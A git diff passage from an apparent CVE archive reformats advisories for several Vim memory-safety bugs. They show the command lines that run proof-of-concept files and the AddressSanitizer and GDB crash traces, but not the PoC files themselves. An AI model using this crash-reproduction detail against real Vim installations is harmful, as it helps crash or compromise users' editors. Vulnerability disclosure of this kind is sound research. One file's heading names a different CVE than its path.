-commit 043d7b2c84cda275354aa023b5769660ea70a168 (HEAD -> master, tag: v9.0.1182, origin/master, origin/HEAD)
-```
-
-#### Proof of Concept
-
-```
-./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_hbo02_s.dat -c :qa!
-=================================================================
-==11458==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000009d00 at pc 0x00000049950f bp 0x7ffcbaff3ef0 sp 0x7ffcbaff36b8
-READ of size 2147479553 at 0x621000009d00 thread T0
-    #0 0x49950e in __asan_memmove (/home/fuzz/vim/src/vim+0x49950e)
-    #1 0xabc5d7 in ml_append_int /home/fuzz/vim/src/memline.c:2951:6
-    #2 0xa9b51f in ml_flush_line /home/fuzz/vim/src/memline.c:4109:9
-    #3 0xab24bc in ml_append_flush /home/fuzz/vim/src/memline.c:3370:2
-    #4 0xab2342 in ml_append_flags /home/fuzz/vim/src/memline.c:3415:12
-    #5 0x117b44a in u_undoredo /home/fuzz/vim/src/undo.c:2821:7
-    #6 0x117535b in u_doit /home/fuzz/vim/src/undo.c:2273:6
-    #7 0x1174c1a in u_undo /home/fuzz/vim/src/undo.c:2214:5
-    #8 0xbaad92 in nv_kundo /home/fuzz/vim/src/normal.c:4737:2
-    #9 0xba3d19 in nv_undo /home/fuzz/vim/src/normal.c:4719:2
-    #10 0xb6448b in normal_cmd /home/fuzz/vim/src/normal.c:939:5
-    #11 0x83ea0e in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887:6
-    #12 0x83e238 in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850:5
-    #13 0x83dde9 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768:6
-    #14 0x8060c1 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580:2
-    #15 0x7f2ae5 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993:17
-    #16 0xea1d75 in do_source_ext /home/fuzz/vim/src/scriptfile.c:1672:5
-    #17 0xe9e7d6 in do_source /home/fuzz/vim/src/scriptfile.c:1818:12
-    #18 0xe9e10c in cmd_source /home/fuzz/vim/src/scriptfile.c:1163:14
-    #19 0xe9d7ee in ex_source /home/fuzz/vim/src/scriptfile.c:1189:2
-    #20 0x8060c1 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580:2
-    #21 0x7f2ae5 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993:17
-    #22 0x7f7831 in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587:12
-    #23 0x14c4e12 in exe_commands /home/fuzz/vim/src/main.c:3146:2
-    #24 0x14c0fae in vim_main2 /home/fuzz/vim/src/main.c:782:2
-    #25 0x14b6449 in main /home/fuzz/vim/src/main.c:433:12
-    #26 0x7f8319ce2082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
-    #27 0x41eaad in _start (/home/fuzz/vim/src/vim+0x41eaad)
-
-0x621000009d00 is located 0 bytes to the right of 4096-byte region [0x621000008d00,0x621000009d00)
-allocated by thread T0 here:
-    #0 0x499d0d in malloc (/home/fuzz/vim/src/vim+0x499d0d)
-    #1 0x4cb3ea in lalloc /home/fuzz/vim/src/alloc.c:246:11
-    #2 0x4cb2ca in alloc /home/fuzz/vim/src/alloc.c:151:12
-    #3 0x14ce9f5 in mf_alloc_bhdr /home/fuzz/vim/src/memfile.c:884:21
-    #4 0x14cd807 in mf_new /home/fuzz/vim/src/memfile.c:375:26
-    #5 0xa98308 in ml_new_data /home/fuzz/vim/src/memline.c:4138:15
-    #6 0xa96ca7 in ml_open /home/fuzz/vim/src/memline.c:391:15
-    #7 0x503cd6 in open_buffer /home/fuzz/vim/src/buffer.c:192:9
-    #8 0x14c265c in create_windows /home/fuzz/vim/src/main.c:2915:9
-    #9 0x14c092d in vim_main2 /home/fuzz/vim/src/main.c:713:5
-    #10 0x14b6449 in main /home/fuzz/vim/src/main.c:433:12
-    #11 0x7f8319ce2082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
-
-SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/fuzz/vim/src/vim+0x49950e) in __asan_memmove
-Shadow bytes around the buggy address:
-  0x0c427fff9350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-  0x0c427fff9360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-  0x0c427fff9370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-  0x0c427fff9380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-  0x0c427fff9390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-=>0x0c427fff93a0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
-  0x0c427fff93b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
-  0x0c427fff93c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
-  0x0c427fff93d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
-  0x0c427fff93e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
-  0x0c427fff93f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
-Shadow byte legend (one shadow byte represents 8 application bytes):
-  Addressable:           00
-  Partially addressable: 01 02 03 04 05 06 07 
-  Heap left redzone:       fa
-  Freed heap region:       fd
-  Stack left redzone:      f1
-  Stack mid redzone:       f2
-  Stack right redzone:     f3
-  Stack after return:      f5
-  Stack use after scope:   f8
-  Global redzone:          f9
-  Global init order:       f6
-  Poisoned by user:        f7
-  Container overflow:      fc
-  Array cookie:            ac
-  Intra object redzone:    bb
-  ASan internal:           fe
-  Left alloca redzone:     ca
-  Right alloca redzone:    cb
-  Shadow gap:              cc
-==11458==ABORTING
-```
-
-#### 影响
-
+#### 描述
+
+memline.c:2951处函数ml_append_int中基于堆的缓冲区溢出
+
+#### 影响版本
+
+```
+git log
+commit 043d7b2c84cda275354aa023b5769660ea70a168 (HEAD -> master, tag: v9.0.1182, origin/master, origin/HEAD)
+```
+
+#### Proof of Concept
+
+```
+./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_hbo02_s.dat -c :qa!
+=================================================================
+==11458==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000009d00 at pc 0x00000049950f bp 0x7ffcbaff3ef0 sp 0x7ffcbaff36b8
+READ of size 2147479553 at 0x621000009d00 thread T0
+    #0 0x49950e in __asan_memmove (/home/fuzz/vim/src/vim+0x49950e)
+    #1 0xabc5d7 in ml_append_int /home/fuzz/vim/src/memline.c:2951:6
+    #2 0xa9b51f in ml_flush_line /home/fuzz/vim/src/memline.c:4109:9
+    #3 0xab24bc in ml_append_flush /home/fuzz/vim/src/memline.c:3370:2
+    #4 0xab2342 in ml_append_flags /home/fuzz/vim/src/memline.c:3415:12
+    #5 0x117b44a in u_undoredo /home/fuzz/vim/src/undo.c:2821:7
+    #6 0x117535b in u_doit /home/fuzz/vim/src/undo.c:2273:6
+    #7 0x1174c1a in u_undo /home/fuzz/vim/src/undo.c:2214:5
+    #8 0xbaad92 in nv_kundo /home/fuzz/vim/src/normal.c:4737:2
+    #9 0xba3d19 in nv_undo /home/fuzz/vim/src/normal.c:4719:2
+    #10 0xb6448b in normal_cmd /home/fuzz/vim/src/normal.c:939:5
+    #11 0x83ea0e in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887:6
+    #12 0x83e238 in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850:5
+    #13 0x83dde9 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768:6
+    #14 0x8060c1 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580:2
+    #15 0x7f2ae5 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993:17
+    #16 0xea1d75 in do_source_ext /home/fuzz/vim/src/scriptfile.c:1672:5
+    #17 0xe9e7d6 in do_source /home/fuzz/vim/src/scriptfile.c:1818:12
+    #18 0xe9e10c in cmd_source /home/fuzz/vim/src/scriptfile.c:1163:14
+    #19 0xe9d7ee in ex_source /home/fuzz/vim/src/scriptfile.c:1189:2
+    #20 0x8060c1 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580:2
+    #21 0x7f2ae5 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993:17
+    #22 0x7f7831 in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587:12
+    #23 0x14c4e12 in exe_commands /home/fuzz/vim/src/main.c:3146:2
+    #24 0x14c0fae in vim_main2 /home/fuzz/vim/src/main.c:782:2
+    #25 0x14b6449 in main /home/fuzz/vim/src/main.c:433:12
+    #26 0x7f8319ce2082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
+    #27 0x41eaad in _start (/home/fuzz/vim/src/vim+0x41eaad)
+
+0x621000009d00 is located 0 bytes to the right of 4096-byte region [0x621000008d00,0x621000009d00)
+allocated by thread T0 here:
+    #0 0x499d0d in malloc (/home/fuzz/vim/src/vim+0x499d0d)
+    #1 0x4cb3ea in lalloc /home/fuzz/vim/src/alloc.c:246:11
+    #2 0x4cb2ca in alloc /home/fuzz/vim/src/alloc.c:151:12
+    #3 0x14ce9f5 in mf_alloc_bhdr /home/fuzz/vim/src/memfile.c:884:21
+    #4 0x14cd807 in mf_new /home/fuzz/vim/src/memfile.c:375:26
+    #5 0xa98308 in ml_new_data /home/fuzz/vim/src/memline.c:4138:15
+    #6 0xa96ca7 in ml_open /home/fuzz/vim/src/memline.c:391:15
+    #7 0x503cd6 in open_buffer /home/fuzz/vim/src/buffer.c:192:9
+    #8 0x14c265c in create_windows /home/fuzz/vim/src/main.c:2915:9
+    #9 0x14c092d in vim_main2 /home/fuzz/vim/src/main.c:713:5
+    #10 0x14b6449 in main /home/fuzz/vim/src/main.c:433:12
+    #11 0x7f8319ce2082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/fuzz/vim/src/vim+0x49950e) in __asan_memmove
+Shadow bytes around the buggy address:
+  0x0c427fff9350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c427fff9360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c427fff9370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c427fff9380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c427fff9390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x0c427fff93a0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c427fff93b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c427fff93c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c427fff93d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c427fff93e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c427fff93f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+  Shadow gap:              cc
+==11458==ABORTING
+```
+
+#### 影响
+
 这个漏洞能够使软件崩溃，修改内存，并可能造成远程执行。
\ No newline at end of file
diff --git "a/cve/vim/2023/CVE-2023-0512/\346\274\217\346\264\236CVE-2023-0512.md" "b/cve/vim/2023/CVE-2023-0512/\346\274\217\346\264\236CVE-2023-0512.md"
index efca437f..30353200 100644
--- "a/cve/vim/2023/CVE-2023-0512/\346\274\217\346\264\236CVE-2023-0512.md"
+++ "b/cve/vim/2023/CVE-2023-0512/\346\274\217\346\264\236CVE-2023-0512.md"
@@ -1,108 +1,108 @@
-# 漏洞CVE-2023-0054
-## Description
-Divide By Zero in function adjust_skipcol at move.c:1978
-
-## Vim Version
-```shell
-git log
-commit 7193323b7796c05573f3aa89d422e848feb3a8dc (HEAD -> master, tag: v9.0.1223, origin/master, origin/HEAD)
-```
-
-## Proof of Concept
-```shell
-./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa!
-Floating point exception./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa!
-Floating point exception
-```
-
-# GDB
-
-```
-gdb --args ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa!
-─── Output/messages ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
-[Thread debugging using libthread_db enabled]
-Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
-
-Program received signal SIGFPE, Arithmetic exception.
-0x0000555555f020d7 in adjust_skipcol () at move.c:1978
-1978            row += col / width2;
-─── Assembly ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
- 0x0000555555f020c4  adjust_skipcol+4025 mov    $0x45c1,%edx
- 0x0000555555f020c9  adjust_skipcol+4030 mov    0xd54f20(%rip),%rax        # 0x555556c56ff0
- 0x0000555555f020d0  adjust_skipcol+4037 mov    %edx,%fs:(%rax)
- 0x0000555555f020d3  adjust_skipcol+4040 mov    -0x2c(%rbp),%eax
- 0x0000555555f020d6  adjust_skipcol+4043 cltd   
- 0x0000555555f020d7  adjust_skipcol+4044 idivl  -0x20(%rbp)
- 0x0000555555f020da  adjust_skipcol+4047 add    %eax,-0x28(%rbp)
- 0x0000555555f020dd  adjust_skipcol+4050 mov    -0x2c(%rbp),%eax
- 0x0000555555f020e0  adjust_skipcol+4053 cltd   
- 0x0000555555f020e1  adjust_skipcol+4054 idivl  -0x20(%rbp)
-─── Breakpoints ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
-─── Expressions ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
-─── History ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
-─── Memory ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
-─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────���───────────────────────────
-      rax 0x0000000000000008       rbx 0x0000555556d8e320       rcx 0x0000555556d968f8      rdx 0x0000000000000000      rsi 0x0000000000000000         rdi 0x0000000000000000
-      rbp 0x00007fffffff8e80       rsp 0x00007fffffff8e50        r8 0x0000000000000007       r9 0x000062100002e0ff      r10 0x00007ffff65a1000         r11 0x00000000000000f8
-      r12 0x00000000fffffff8       r13 0x00000ffffffff1fa       r14 0x00007fffffff8fd0      r15 0x00007fffffffb750      rip 0x0000555555f020d7      eflags [ IF RF ]         
-       cs 0x00000033                ss 0x0000002b                ds 0x00000000               es 0x00000000               fs 0x00000000                  gs 0x00000000        
-─── Source ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
- 1973      col -= width1;
- 1974      ++row;
- 1975      }
- 1976      if (col > width2)
- 1977      {
- 1978      row += col / width2;
- 1979      col = col % width2;
- 1980      }
- 1981      if (row >= curwin->w_height)
- 1982      {
-─── Stack ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
-[0] from 0x0000555555f020d7 in adjust_skipcol+4044 at move.c:1978
-[1] from 0x00005555558e44b0 in beginline+1831 at edit.c:2642
-[2] from 0x0000555555a741c4 in do_ecmd+35847 at ex_cmds.c:3167
-[3] from 0x0000555555b0626f in do_exedit+4927 at ex_docmd.c:7187
-[4] from 0x0000555555b01393 in ex_splitview+5888 at ex_docmd.c:6834
-[5] from 0x0000555555abd910 in do_one_cmd+59345 at ex_docmd.c:2580
-[6] from 0x0000555555aa5e4a in do_cmdline+16990 at ex_docmd.c:993
-[7] from 0x0000555555aa1bbd in do_cmdline_cmd+43 at ex_docmd.c:587
-[8] from 0x00005555568f8e11 in do_window+5838 at window.c:274
-[9] from 0x0000555555f71e34 in nv_window+730 at normal.c:5614
-[+]
-─── Threads ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
-[1] id 2116628 name vim from 0x0000555555f020d7 in adjust_skipcol+4044 at move.c:1978
-─── Variables ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
-loc width1 = -8, width2 = 0, so = 0, scrolloff_cols = 0, scrolled = 0, col = 8, row = 1
-───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
->>> bt
-#0  0x0000555555f020d7 in adjust_skipcol () at move.c:1978
-#1  0x00005555558e44b0 in beginline (flags=6) at edit.c:2642
-#2  0x0000555555a741c4 in do_ecmd (fnum=0, ffname=0x0, sfname=0x0, eap=0x7fffffffb410, newlnum=1, flags=1, oldwin=0x0) at ex_cmds.c:3167
-#3  0x0000555555b0626f in do_exedit (eap=0x7fffffffb410, old_curwin=0x625000023100) at ex_docmd.c:7187
-#4  0x0000555555b01393 in ex_splitview (eap=0x7fffffffb410) at ex_docmd.c:6834
-#5  0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffb780, flags=11, cstack=0x7fffffffb8a0, fgetline=0x0, cookie=0x0) at ex_docmd.c:2580
-#6  0x0000555555aa5e4a in do_cmdline (cmdline=0x7fffffffc090 "new", fgetline=0x0, cookie=0x0, flags=11) at ex_docmd.c:993
-#7  0x0000555555aa1bbd in do_cmdline_cmd (cmd=0x7fffffffc090 "new") at ex_docmd.c:587
-#8  0x00005555568f8e11 in do_window (nchar=14, Prenum=0, xchar=0) at window.c:274
-#9  0x0000555555f71e34 in nv_window (cap=0x7fffffffc210) at normal.c:5614
-#10 0x0000555555f28ab7 in normal_cmd (oap=0x7fffffffc330, toplevel=1) at normal.c:938
-#11 0x0000555555b1b123 in exec_normal (was_typed=0, use_vpeekc=0, may_use_terminal_loop=0) at ex_docmd.c:8887
-#12 0x0000555555b1aab8 in exec_normal_cmd (cmd=0x611000000b88 "0", remap=0, silent=0) at ex_docmd.c:8850
-#13 0x0000555555b19a00 in ex_normal (eap=0x7fffffffc710) at ex_docmd.c:8768
-#14 0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffca80, flags=7, cstack=0x7fffffffcba0, fgetline=0x555556341b6c <getsourceline>, cookie=0x7fffffffd470) at ex_docmd.c:2580
-#15 0x0000555555aa5e4a in do_cmdline (cmdline=0x611000000540 "wi0 0", fgetline=0x555556341b6c <getsourceline>, cookie=0x7fffffffd470, flags=7) at ex_docmd.c:993
-#16 0x000055555633a828 in do_source_ext (fname=0x603000000e23 "./poc_dbz01_s.dat", check_other=0, is_vimrc=0, ret_sid=0x0, eap=0x0, clearvars=0) at scriptfile.c:1672
-#17 0x000055555633d027 in do_source (fname=0x603000000e23 "./poc_dbz01_s.dat", check_other=0, is_vimrc=0, ret_sid=0x0) at scriptfile.c:1818
-#18 0x000055555633571a in cmd_source (fname=0x603000000e23 "./poc_dbz01_s.dat", eap=0x7fffffffd6d0) at scriptfile.c:1163
-#19 0x0000555556335873 in ex_source (eap=0x7fffffffd6d0) at scriptfile.c:1189
-#20 0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffda40, flags=11, cstack=0x7fffffffdb60, fgetline=0x0, cookie=0x0) at ex_docmd.c:2580
-#21 0x0000555555aa5e4a in do_cmdline (cmdline=0x603000000af0 "so ./poc_dbz01_s.dat", fgetline=0x0, cookie=0x0, flags=11) at ex_docmd.c:993
-#22 0x0000555555aa1bbd in do_cmdline_cmd (cmd=0x603000000af0 "so ./poc_dbz01_s.dat") at ex_docmd.c:587
-#23 0x0000555556adbcd1 in exe_commands (parmp=0x555556d8d460 <params>) at main.c:3146
-#24 0x0000555556ac5d79 in vim_main2 () at main.c:782
-#25 0x0000555556ac3251 in main (argc=15, argv=0x7fffffffe438) at main.c:433
-```
-
-## Impact
-
+# 漏洞CVE-2023-0054
+## Description
+Divide By Zero in function adjust_skipcol at move.c:1978
+
+## Vim Version
+```shell
+git log
+commit 7193323b7796c05573f3aa89d422e848feb3a8dc (HEAD -> master, tag: v9.0.1223, origin/master, origin/HEAD)
+```
+
+## Proof of Concept
+```shell
+./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa!
+Floating point exception./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa!
+Floating point exception
+```
+
+# GDB
+
+```
+gdb --args ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa!
+─── Output/messages ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+[Thread debugging using libthread_db enabled]
+Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
+
+Program received signal SIGFPE, Arithmetic exception.
+0x0000555555f020d7 in adjust_skipcol () at move.c:1978
+1978            row += col / width2;
+─── Assembly ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ 0x0000555555f020c4  adjust_skipcol+4025 mov    $0x45c1,%edx
+ 0x0000555555f020c9  adjust_skipcol+4030 mov    0xd54f20(%rip),%rax        # 0x555556c56ff0
+ 0x0000555555f020d0  adjust_skipcol+4037 mov    %edx,%fs:(%rax)
+ 0x0000555555f020d3  adjust_skipcol+4040 mov    -0x2c(%rbp),%eax
+ 0x0000555555f020d6  adjust_skipcol+4043 cltd   
+ 0x0000555555f020d7  adjust_skipcol+4044 idivl  -0x20(%rbp)
+ 0x0000555555f020da  adjust_skipcol+4047 add    %eax,-0x28(%rbp)
+ 0x0000555555f020dd  adjust_skipcol+4050 mov    -0x2c(%rbp),%eax
+ 0x0000555555f020e0  adjust_skipcol+4053 cltd   
+ 0x0000555555f020e1  adjust_skipcol+4054 idivl  -0x20(%rbp)
+─── Breakpoints ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+─── Expressions ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+─── History ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+─── Memory ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────���───────────────────────────
+      rax 0x0000000000000008       rbx 0x0000555556d8e320       rcx 0x0000555556d968f8      rdx 0x0000000000000000      rsi 0x0000000000000000         rdi 0x0000000000000000
+      rbp 0x00007fffffff8e80       rsp 0x00007fffffff8e50        r8 0x0000000000000007       r9 0x000062100002e0ff      r10 0x00007ffff65a1000         r11 0x00000000000000f8
+      r12 0x00000000fffffff8       r13 0x00000ffffffff1fa       r14 0x00007fffffff8fd0      r15 0x00007fffffffb750      rip 0x0000555555f020d7      eflags [ IF RF ]         
+       cs 0x00000033                ss 0x0000002b                ds 0x00000000               es 0x00000000               fs 0x00000000                  gs 0x00000000        
+─── Source ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ 1973      col -= width1;
+ 1974      ++row;
+ 1975      }
+ 1976      if (col > width2)
+ 1977      {
+ 1978      row += col / width2;
+ 1979      col = col % width2;
+ 1980      }
+ 1981      if (row >= curwin->w_height)
+ 1982      {
+─── Stack ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+[0] from 0x0000555555f020d7 in adjust_skipcol+4044 at move.c:1978
+[1] from 0x00005555558e44b0 in beginline+1831 at edit.c:2642
+[2] from 0x0000555555a741c4 in do_ecmd+35847 at ex_cmds.c:3167
+[3] from 0x0000555555b0626f in do_exedit+4927 at ex_docmd.c:7187
+[4] from 0x0000555555b01393 in ex_splitview+5888 at ex_docmd.c:6834
+[5] from 0x0000555555abd910 in do_one_cmd+59345 at ex_docmd.c:2580
+[6] from 0x0000555555aa5e4a in do_cmdline+16990 at ex_docmd.c:993
+[7] from 0x0000555555aa1bbd in do_cmdline_cmd+43 at ex_docmd.c:587
+[8] from 0x00005555568f8e11 in do_window+5838 at window.c:274
+[9] from 0x0000555555f71e34 in nv_window+730 at normal.c:5614
+[+]
+─── Threads ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+[1] id 2116628 name vim from 0x0000555555f020d7 in adjust_skipcol+4044 at move.c:1978
+─── Variables ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+loc width1 = -8, width2 = 0, so = 0, scrolloff_cols = 0, scrolled = 0, col = 8, row = 1
+───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+>>> bt
+#0  0x0000555555f020d7 in adjust_skipcol () at move.c:1978
+#1  0x00005555558e44b0 in beginline (flags=6) at edit.c:2642
+#2  0x0000555555a741c4 in do_ecmd (fnum=0, ffname=0x0, sfname=0x0, eap=0x7fffffffb410, newlnum=1, flags=1, oldwin=0x0) at ex_cmds.c:3167
+#3  0x0000555555b0626f in do_exedit (eap=0x7fffffffb410, old_curwin=0x625000023100) at ex_docmd.c:7187
+#4  0x0000555555b01393 in ex_splitview (eap=0x7fffffffb410) at ex_docmd.c:6834
+#5  0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffb780, flags=11, cstack=0x7fffffffb8a0, fgetline=0x0, cookie=0x0) at ex_docmd.c:2580
+#6  0x0000555555aa5e4a in do_cmdline (cmdline=0x7fffffffc090 "new", fgetline=0x0, cookie=0x0, flags=11) at ex_docmd.c:993
+#7  0x0000555555aa1bbd in do_cmdline_cmd (cmd=0x7fffffffc090 "new") at ex_docmd.c:587
+#8  0x00005555568f8e11 in do_window (nchar=14, Prenum=0, xchar=0) at window.c:274
+#9  0x0000555555f71e34 in nv_window (cap=0x7fffffffc210) at normal.c:5614
+#10 0x0000555555f28ab7 in normal_cmd (oap=0x7fffffffc330, toplevel=1) at normal.c:938
+#11 0x0000555555b1b123 in exec_normal (was_typed=0, use_vpeekc=0, may_use_terminal_loop=0) at ex_docmd.c:8887
+#12 0x0000555555b1aab8 in exec_normal_cmd (cmd=0x611000000b88 "0", remap=0, silent=0) at ex_docmd.c:8850
+#13 0x0000555555b19a00 in ex_normal (eap=0x7fffffffc710) at ex_docmd.c:8768
+#14 0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffca80, flags=7, cstack=0x7fffffffcba0, fgetline=0x555556341b6c <getsourceline>, cookie=0x7fffffffd470) at ex_docmd.c:2580
+#15 0x0000555555aa5e4a in do_cmdline (cmdline=0x611000000540 "wi0 0", fgetline=0x555556341b6c <getsourceline>, cookie=0x7fffffffd470, flags=7) at ex_docmd.c:993
+#16 0x000055555633a828 in do_source_ext (fname=0x603000000e23 "./poc_dbz01_s.dat", check_other=0, is_vimrc=0, ret_sid=0x0, eap=0x0, clearvars=0) at scriptfile.c:1672
+#17 0x000055555633d027 in do_source (fname=0x603000000e23 "./poc_dbz01_s.dat", check_other=0, is_vimrc=0, ret_sid=0x0) at scriptfile.c:1818
+#18 0x000055555633571a in cmd_source (fname=0x603000000e23 "./poc_dbz01_s.dat", eap=0x7fffffffd6d0) at scriptfile.c:1163
+#19 0x0000555556335873 in ex_source (eap=0x7fffffffd6d0) at scriptfile.c:1189
+#20 0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffda40, flags=11, cstack=0x7fffffffdb60, fgetline=0x0, cookie=0x0) at ex_docmd.c:2580
+#21 0x0000555555aa5e4a in do_cmdline (cmdline=0x603000000af0 "so ./poc_dbz01_s.dat", fgetline=0x0, cookie=0x0, flags=11) at ex_docmd.c:993
+#22 0x0000555555aa1bbd in do_cmdline_cmd (cmd=0x603000000af0 "so ./poc_dbz01_s.dat") at ex_docmd.c:587
+#23 0x0000555556adbcd1 in exe_commands (parmp=0x555556d8d460 <params>) at main.c:3146
+#24 0x0000555556ac5d79 in vim_main2 () at main.c:782
+#25 0x0000555556ac3251 in main (argc=15, argv=0x7fffffffe438) at main.c:433
+```
+
+## Impact
+
 This vulnerability is capable of crashing software, modify memory, and possible remote execution.
\ No newline at end of file
diff --git a/cve/vim/2023/CVE-2023-1175/README.md b/cve/vim/2023/CVE-2023-1175/README.md
index eba25fc4..56e610cd 100644
--- a/cve/vim/2023/CVE-2023-1175/README.md
+++ b/cve/vim/2023/CVE-2023-1175/README.md
@@ -1,134 +1,134 @@
-## Description
-Incorrect Calculation of Buffer Size in function yank_copy_line at register.c:1468
-## vim version
-```bash
-git log
-commit 657aea7fc47fb919ce76fad64ba0ec55a1af80f1 (HEAD -> master, tag: v9.0.1249, origin/master, origin/HEAD)
-```
-## POC
-```bash
-./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_nsp01_s.dat -c :qa!
-=================================================================
-==1962298==ERROR: AddressSanitizer: negative-size-param: (size=-1)
-    #0 0x7ffff75eafdd in __interceptor_memset ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762
-    #1 0x5555562c58ad in yank_copy_line /home/fuzz/vim/src/register.c:1468
-    #2 0x5555562c35bd in op_yank /home/fuzz/vim/src/register.c:1290
-    #3 0x555555f96baf in op_delete /home/fuzz/vim/src/ops.c:742
